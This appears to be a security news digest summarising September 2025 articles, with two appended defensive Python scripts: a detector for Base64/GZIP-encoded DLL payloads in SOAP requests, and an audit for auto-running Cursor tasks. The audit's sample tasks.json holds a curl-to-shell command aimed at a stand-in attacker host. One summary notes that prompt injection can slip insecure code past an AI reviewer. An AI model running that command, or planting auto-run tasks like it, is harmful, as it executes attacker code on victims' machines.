Daily Brief
Articles are listed below; the 'Details' entry for each one carries the generated summary
Total articles found: 11760
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-09-12 16:25:28 | bleepingcomputer | VULNERABILITIES | CISA Alerts on Critical RCE Flaw in Dassault's DELMIA Apriso | CISA has issued a warning about a critical remote code execution vulnerability in DELMIA Apriso, a manufacturing operations management product from Dassault Systèmes. The vulnerability, CVE-2025-5086, carries a CVSS score of 9.0 and affects all DELMIA Apriso versions from Release 2020 through Release 2025. The flaw is a deserialization of untrusted data weakness that lets attackers execute arbitrary code remotely on affected systems. Active exploitation attempts have been observed: malicious SOAP requests carry an encoded .NET executable that the vulnerable service loads and runs. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog and requires federal agencies to apply the vendor's patches by October 2, 2025. The directive binds only federal civilian agencies, but any enterprise running DELMIA Apriso should treat the warning as an immediate patching priority. DELMIA Apriso is used across automotive, aerospace and electronics manufacturing, where it is central to production and quality management processes. | Details |
| 2025-09-12 15:19:43 | thehackernews | VULNERABILITIES | Samsung Patches Critical Zero-Day Vulnerability in Android Devices | Samsung has released a security update for CVE-2025-21043, a critical vulnerability that allows arbitrary code execution on its Android devices. The flaw, rated 8.8 on the CVSS scale, is an out-of-bounds write in the closed-source image parsing library libimagecodec.quram.so. Android 13 through 16 are affected; the bug was privately reported to Samsung in August 2025 by the Meta and WhatsApp security teams. Samsung confirmed that an exploit exists in the wild but gave no details on the attackers or how the exploit was delivered. The patch follows Google's recent fixes for two other actively exploited Android vulnerabilities, pointing to continued targeted attacks on the platform. Organizations with Samsung Android fleets should prioritize rolling out the September 2025 security update. The incident again shows the value of timely vulnerability management and of vendors and researchers working together on disclosure. | Details |
| 2025-09-12 14:55:22 | thehackernews | DATA BREACH | Apple Warns French Users of Fourth Spyware Campaign in 2025 | Apple has alerted French users to a new spyware campaign targeting their devices, the fourth such notification in 2025 according to CERT-FR. The attacks are targeted, focusing on people in sensitive roles such as journalists, lawyers and politicians. The campaign chains a WhatsApp flaw (CVE-2025-55177) with an Apple iOS bug (CVE-2025-43300) into a zero-click exploit that needs no user interaction. WhatsApp has notified fewer than 200 users who may have been affected. Apple has introduced Memory Integrity Enforcement in its newest iPhone models to blunt the memory corruption exploits that spyware relies on. A recent Atlantic Council report notes a sharp rise in U.S. investment in spyware technology, now surpassing Israel and Italy. The same report identifies many new entrants in the spyware market, underscoring the industry's growing complexity and global reach. | Details |
| 2025-09-12 14:36:06 | theregister | CYBERCRIME | Cyber Attack Disrupts University of Amsterdam's Smart Laundry Services | An attack on smart laundry machines at the University of Amsterdam's Spinozacampus has left around 1,250 students without convenient laundry facilities since July. The digital payment system on five machines was compromised so that anyone could use them for free; management eventually closed the laundry room because of the resulting losses. Duwo, the company that manages the building, has not resolved the issue and declines to absorb the costs, saying it needs the income to keep its services affordable. Students are left with a single analog machine, and some fear hygiene problems such as lice outbreaks. The University of Amsterdam has offered no additional support and refers inquiries back to Duwo, so students must find alternative laundry arrangements. The incident is a small but concrete example of the exposure of IoT and connected payment devices, attacks on which have risen sharply in recent years. It also shows why even mundane connected systems need basic security controls to avoid disruption of everyday services. | Details |
| 2025-09-12 14:07:02 | bleepingcomputer | MISCELLANEOUS | Essential Cyberattack Response: Clarity, Control, and Recovery Lifelines | Responding to a cyberattack requires immediate clarity about what is happening, control over the attack's spread, and a reliable recovery path to limit damage and restore operations quickly. Real-time visibility is essential for identifying the nature of the attack and which systems are compromised, so that decisions rest on evidence rather than guesswork. Effective control means containing the attack using predefined roles, playbooks and integrated incident response tooling. A tested backup and recovery solution is the lifeline that restores systems and preserves client trust after an attack. Preparation, including monitoring and incident response planning done in advance, is what separates a successful recovery from a disaster. The article, from the Acronis Threat Research Unit, stresses readiness and offers guidance to IT teams. | Details |
| 2025-09-12 12:14:46 | thehackernews | VULNERABILITIES | Critical Vulnerability in DELMIA Apriso Software Actively Exploited Globally | CISA has added CVE-2025-5086, a critical flaw in Dassault Systèmes' DELMIA Apriso software, to its Known Exploited Vulnerabilities catalog because it is being exploited in the wild. The vulnerability affects Release 2020 through Release 2025 and allows remote code execution through deserialization of untrusted data. Observed exploitation attempts came from a single IP address in Mexico and take the form of HTTP SOAP requests carrying Base64-encoded payloads aimed at specific application endpoints. The payload decodes to a GZIP-compressed Windows DLL that is detected as "Trojan.MSIL.Zapchast.gen", a .NET malware family used for electronic surveillance and data exfiltration. Zapchast has appeared in phishing campaigns over the past decade and can log keystrokes, capture screenshots and enumerate active applications. Federal Civilian Executive Branch agencies must apply the vendor's updates by October 2, 2025. Organizations running affected versions should patch immediately and monitor for anomalous requests to the application and other unusual network activity. | Details |
| 2025-09-12 11:55:03 | thehackernews | MALWARE | New HybridPetya Ransomware Exploits UEFI Secure Boot Vulnerability | ESET has identified HybridPetya, a new ransomware family that can bypass UEFI Secure Boot on systems that have not applied the fix for CVE-2024-7344. Like Petya and NotPetya, HybridPetya encrypts the Master File Table of NTFS partitions; unlike them, it can compromise modern UEFI-based systems by installing a malicious EFI application on the EFI System Partition. The malware consists of an installer and a bootkit; the bootkit performs the MFT encryption while showing victims a misleading on-screen message, then demands $1,000 in Bitcoin for the decryption key. Some variants exploit CVE-2024-7344, a Secure Boot bypass in the Microsoft-signed Howyar Reloader UEFI application, which loads an unverified binary from a cloak.dat file without Secure Boot checks; the bootkit is delivered in that file. Microsoft revoked the vulnerable Reloader binary in its January 2025 Patch Tuesday update, so systems with the revocation applied are not exposed to that variant. ESET's telemetry shows no active deployment, so HybridPetya may be a proof of concept or research project rather than a live threat. Its appearance still shows the growing interest in Secure Boot bypasses among researchers and attackers alike, and why applying UEFI revocations matters. | Details |
| 2025-09-12 11:44:58 | bleepingcomputer | CYBERCRIME | Memphis Man Sentenced for Selling Stolen Pre-Release Movies | A Memphis man, Steven R. Hale, has been sentenced to 57 months in prison for stealing and selling digital copies of unreleased movies from a DVD and Blu-ray distribution company. Hale pleaded guilty to criminal copyright infringement; the titles involved include "Spider-Man: No Way Home" and "Black Widow". The scheme ran from February 2021 to March 2022, with ripped DVDs and Blu-rays sold through various e-commerce platforms. Copies of the stolen films were downloaded millions of times online, with estimated losses to copyright holders in the tens of millions of dollars. Hale, who had a prior armed robbery conviction, was also charged with unlawful firearm possession during the investigation. The case illustrates the continuing difficulty of protecting pre-release digital media and the scale of losses that piracy can cause. | Details |
| 2025-09-12 10:21:08 | theregister | MISCELLANEOUS | Digital ID Proposal Sparks Privacy Concerns and Surveillance Fears | Big Brother Watch's "Checkpoint Britain" report warns that a proposed national digital ID could enable widespread government surveillance and fundamentally change the relationship between citizen and state. The report argues that the scheme, pitched as a tool against illegal immigration, lacks evidence that it would work and is likely to expand beyond its stated purpose. It highlights the risk of "mission creep", in which a nominally voluntary ID becomes mandatory in practice once access to essential services depends on it. A YouGov poll found that 63% of British citizens do not trust the government to protect their data, citing past IT project failures and data breaches. The existing GOV.UK One Login system, which the "BritCard" proposal would build on, has itself been reported to have significant security weaknesses. Critics argue the scheme would burden law-abiding citizens without meaningfully deterring unauthorized immigration. The report urges the government to impose strict limits and safeguards so that the digital ID cannot become a mass surveillance tool. Earlier UK attempts at national ID systems met strong resistance, and the same privacy-versus-security debate is now resurfacing. | Details |
| 2025-09-12 09:55:17 | bleepingcomputer | VULNERABILITIES | Samsung Patches Zero-Day Vulnerability Exploited in Android Devices | Samsung has fixed CVE-2025-21043, a critical remote code execution vulnerability affecting its devices running Android 13 and later, which was reported by the Meta and WhatsApp security teams. The flaw is an out-of-bounds write in the closed-source image parsing library libimagecodec.quram.so; a malformed image processed by the library can trigger it and let an attacker execute code remotely. The targets have not been disclosed, but WhatsApp users on Samsung devices were potentially affected, and any other messaging app that decodes images through the same library is exposed to the same bug. Samsung published an advisory and shipped the fix in its September 2025 security update. WhatsApp had earlier patched a zero-click vulnerability in its iOS and macOS clients that was chained with an Apple zero-day, urging affected users to update and perform a full device reset. The incident shows the continuing threat from sophisticated zero-day exploits against widely used platforms and the need to apply security updates promptly. Samsung and Meta have not released further details on the attacks, so defenders should rely on timely patching and vigilance rather than waiting for indicators. | Details |
| 2025-09-12 09:39:07 | theregister | CYBERCRIME | UK Schools Face Cyber Threats Predominantly From Students, ICO Reports | The UK's Information Commissioner's Office (ICO) reports that more than half of the cyber incidents it analysed in schools were initiated by students, with 57% of incidents linked to student activity. Stolen login details account for 30% of breaches, and students were behind 97% of those cases, typically by watching credentials being typed or noting them down. Only 5% of attacks used sophisticated techniques, but the ICO stresses that schools need to understand and mitigate these insider threats. The ICO urges parents to monitor their children's online activity and intervene early to stop them drifting into cybercrime. Schools are advised to improve GDPR training and to harden systems so that students have as few opportunities as possible to reach sensitive data. Staff also contribute: 23% of incidents were linked to poor data protection practice such as unauthorized access or misuse of devices. The ICO and the National Crime Agency (NCA) point to awareness programmes such as Cyber Choices that steer young people towards legal cybersecurity careers. | Details |
| 2025-09-12 08:00:32 | thehackernews | MISCELLANEOUS | Emphasizing Runtime Visibility in Cloud-Native Security Strategies | The shift to cloud-native applications built on containers and serverless functions is expanding the attack surface faster than traditional scan-and-report security models can keep up. Cloud-native application protection platforms (CNAPPs) respond by consolidating visibility, compliance, detection and response into a single system. Runtime visibility is the key capability for 2025: seeing which vulnerabilities are actually loaded and reachable in running workloads lets teams prioritize exploitable risk over theoretical findings. AI features in CNAPPs are being used to filter noise and enrich alerts with context, shortening detection and mean time to resolution. Accountability is built in by mapping each finding back to the team that owns the affected code or infrastructure, so remediation follows a shared-responsibility model. Consolidating tools into one platform is meant to reduce fragmentation and operational overhead and keep attention on real-world threats. As cloud-native estates grow, the article argues, security strategy must centre on runtime visibility, AI-assisted prioritization and unified platforms. | Details |
| 2025-09-12 07:20:36 | theregister | MISCELLANEOUS | Ethical Debate Arises Over Huntress's Attacker Surveillance Methodology | Huntress monitored an attacker's activity after the attacker inadvertently installed the company's EDR agent on their own machine, prompting an ethics debate in the security community. The attacker, whose identity is unconfirmed, installed the agent after clicking a sponsored Google link, which gave Huntress visibility into their operations for about three months. In that time Huntress observed the attacker using automation, AI tools, phishing kits and malware, and working in Thai, Spanish and Portuguese. The observation yielded rare first-hand insight into attacker tradecraft, but also raised questions about privacy and the propriety of a private company conducting this kind of surveillance. Huntress defended the work as consistent with industry practice and intended to educate defenders. Critics asked whether the monitoring amounted to unauthorized surveillance, and whether Huntress should have handed the case to law enforcement once it turned from incident response into intelligence collection. The case has prompted wider discussion about where security research ends and privacy rights begin. | Details |
| 2025-09-12 04:56:17 | thehackernews | VULNERABILITIES | Security Flaw in Cursor AI Editor Allows Silent Code Execution | A weakness in the Cursor AI code editor allows arbitrary code execution as soon as a malicious repository is opened, with no prompt or further user action. The root cause is that Cursor ships with the Workspace Trust feature disabled by default, so tasks a repository is configured to auto-run on folder open execute immediately instead of being held back until the user marks the folder as trusted. An attacker only needs to commit the autorun configuration to a repository and get the victim to open it; the resulting code runs with the user's privileges and can leak credentials, modify files or compromise the system further. Users are advised to enable Workspace Trust, open untrusted repositories in a different editor, and review a repository's task and editor configuration before opening it in Cursor. The finding fits a broader pattern in which AI-powered development tools are exposed both to prompt injection and to conventional software vulnerabilities. Anthropic's Claude Code faces related threats: prompt injection can cause insecure code to slip past its automated security review. AI-driven development tools need security as a foundational requirement rather than an afterthought. | Details |
| 2025-09-11 21:40:34 | theregister | MISCELLANEOUS | US Surveillanceware Investment Surges, Challenging National Security Efforts | An Atlantic Council report documents a sharp rise in US investment in surveillanceware, identifying 20 new US-based investors, more than three times the number found in any other leading country. Surveillanceware, typically sold to law enforcement and intelligence agencies, is gaining traction in the US even as governments try to curb its spread through initiatives such as the Pall Mall Process. The report catalogues many new entities, including holding companies and investors, moving into the market and warns of the national security implications. One notable case is AE Industrial Partners' investment in Paragon Solutions, which resumed its contract with ICE after the ownership change sidestepped earlier restrictions. Another is Integrity Partners' $30 million acquisition of Saito Tech Ltd, a company on the US Entity List, which exposes a regulatory gap that allows investment in restricted entities. A growing layer of resellers marketing surveillance technology complicates oversight, since these intermediaries operate discreetly and are hard to track. The report calls on the US to resolve the contradiction between its industry's investment in spyware and its own policy of restricting it. | Details |
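The two DELMIA Apriso entries above (the CISA alert and the Hacker News report) describe the observed exploit traffic as SOAP requests carrying a Base64-encoded, GZIP-compressed Windows DLL. The following is an added example, not code from CISA, SANS, Dassault or either article, showing how a request-inspection rule or log-pipeline filter could flag such requests: it pulls long Base64 runs out of a request body, decodes and gunzips them, and checks for a PE image (an MZ header plus a PE signature at e_lfanew). The SOAP envelope, element names and the fake DLL bytes are constructed for the example and do not reproduce the real exploit.

```python
"""Flag SOAP request bodies that carry a Base64-encoded, GZIP-compressed PE image.

Added example for the DELMIA Apriso (CVE-2025-5086) exploitation pattern
described above; it is not code from CISA, SANS, Dassault or the articles.
The SOAP envelopes, element names and the fake DLL bytes are constructed.
"""
import base64
import gzip
import re
import struct
import zlib

# Long Base64 runs only; short tokens in ordinary SOAP fields are ignored.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with a DOS 'MZ' header and has 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_candidate(blob: str):
    """Base64-decode a blob and gunzip it if it carries the GZIP magic.

    Returns (payload, was_gzip), or None when the blob is not valid Base64 or
    the GZIP stream is corrupt.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None
    if raw[:2] != GZIP_MAGIC:
        return raw, False
    try:
        return gzip.decompress(raw), True
    except (OSError, EOFError, zlib.error):
        return None


def scan_soap_body(body: str) -> list[dict]:
    """Return one finding per Base64 blob in the body that decodes to a PE image."""
    findings = []
    for match in B64_BLOB.finditer(body):
        decoded = decode_candidate(match.group(0))
        if decoded is None:
            continue
        payload, was_gzip = decoded
        if looks_like_pe(payload):
            findings.append({"offset": match.start(), "gzip": was_gzip,
                             "size": len(payload)})
    return findings


def build_fake_pe() -> bytes:
    """Constructed bytes with an MZ header and PE signature; not a real DLL."""
    header = bytearray(0x80)
    header[0:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    header[0x40:0x44] = b"PE\0\0"
    return bytes(header) + bytes(range(256)) * 4  # filler so the blob is long


# Constructed sample traffic: a normal request and one carrying the payload.
SOAP_OPEN = '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
SOAP_CLOSE = "</soap:Body></soap:Envelope>"
SAMPLE_BENIGN = SOAP_OPEN + "<GetOrder><OrderId>12345</OrderId></GetOrder>" + SOAP_CLOSE
MALICIOUS_BLOB = base64.b64encode(gzip.compress(build_fake_pe())).decode()
SAMPLE_MALICIOUS = SOAP_OPEN + "<Import><Data>" + MALICIOUS_BLOB + "</Data></Import>" + SOAP_CLOSE


if __name__ == "__main__":
    for name, body in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS)):
        print(name, scan_soap_body(body))
```

Run it over a capture of the application's inbound requests; anything it flags should also be hashed and compared with the vendor's and CISA's indicators. The check is deliberately generic (any embedded PE image, compressed or not), so it will also catch legitimate uploads that carry executables, which is worth baselining before the rule is used to block rather than alert.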
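The Cursor entry above explains that Workspace Trust is off by default, so a repository's auto-run task executes the moment the folder is opened. The following added example (not Cursor's code and not from the cited research) is a small pre-open audit script. It assumes the VS Code task format that Cursor inherits: tasks in `.vscode/tasks.json` whose `runOptions.runOn` is `folderOpen` run when the folder is opened, and the user setting `security.workspace.trust.enabled` is what gates them. The sample repository, task, attacker URL and settings fragments are constructed for the example.

```python
"""Pre-open audit for repositories that contain editor tasks set to auto-run.

Added example for the Cursor Workspace Trust issue described above; it is not
Cursor's code and not from the cited research. It assumes the VS Code task
format that Cursor inherits: a task in .vscode/tasks.json whose
runOptions.runOn is "folderOpen" runs when the folder is opened, and the user
setting security.workspace.trust.enabled gates that behaviour. The sample
repository, task and settings are constructed for the example.
"""
import json
import re
import tempfile
from pathlib import Path

# The weak editor setting described in the article, beside the corrected one
# (both are fragments of the user settings.json).
WEAK_SETTINGS = {"security.workspace.trust.enabled": False}
HARDENED_SETTINGS = {
    "security.workspace.trust.enabled": True,
    "security.workspace.trust.startupPrompt": "always",
}


def strip_json_comments(text: str) -> str:
    """tasks.json is JSON with comments; drop block and whole-line comments."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)


def find_autorun_tasks(repo: Path) -> list[dict]:
    """Return tasks in <repo>/.vscode/tasks.json configured to run on folder open."""
    tasks_file = repo / ".vscode" / "tasks.json"
    if not tasks_file.is_file():
        return []
    try:
        doc = json.loads(strip_json_comments(tasks_file.read_text(encoding="utf-8")))
    except (json.JSONDecodeError, UnicodeDecodeError):
        return []   # a file the editor cannot parse cannot auto-run anything
    hits = []
    for task in doc.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            hits.append({"label": task.get("label", "<unnamed>"),
                         "type": task.get("type"),
                         "command": task.get("command"),
                         "args": task.get("args", [])})
    return hits


def workspace_trust_enabled(settings: dict) -> bool:
    """Cursor ships with trust off, so an unset key is treated as disabled."""
    return bool(settings.get("security.workspace.trust.enabled", False))


def safe_to_open(repo: Path, settings: dict) -> bool:
    """Open without manual review only if trust gating is on or nothing auto-runs."""
    return workspace_trust_enabled(settings) or not find_autorun_tasks(repo)


# Constructed sample: a task that looks like harmless project setup.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample tasks.json for the audit example
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -s http://attacker.invalid/x | sh"],
      "runOptions": { "runOn": "folderOpen" }
    },
    { "label": "build", "type": "shell", "command": "make" }
  ]
}'''


def build_sample_repo() -> Path:
    """Write the constructed tasks.json into a fresh temporary checkout."""
    repo = Path(tempfile.mkdtemp(prefix="cursor-audit-"))
    (repo / ".vscode").mkdir()
    (repo / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSON, encoding="utf-8")
    return repo


if __name__ == "__main__":
    repo = build_sample_repo()
    for hit in find_autorun_tasks(repo):
        print("auto-run task:", hit)
    print("safe with weak settings:", safe_to_open(repo, WEAK_SETTINGS))
    print("safe with hardened settings:", safe_to_open(repo, HARDENED_SETTINGS))
```

Point it at a checkout before opening the folder in Cursor; the hardened fragment is what belongs in the user settings.json. The script inspects only the task mechanism the entry describes, so it complements rather than replaces enabling Workspace Trust, which is what actually stops the editor from running repository-supplied configuration.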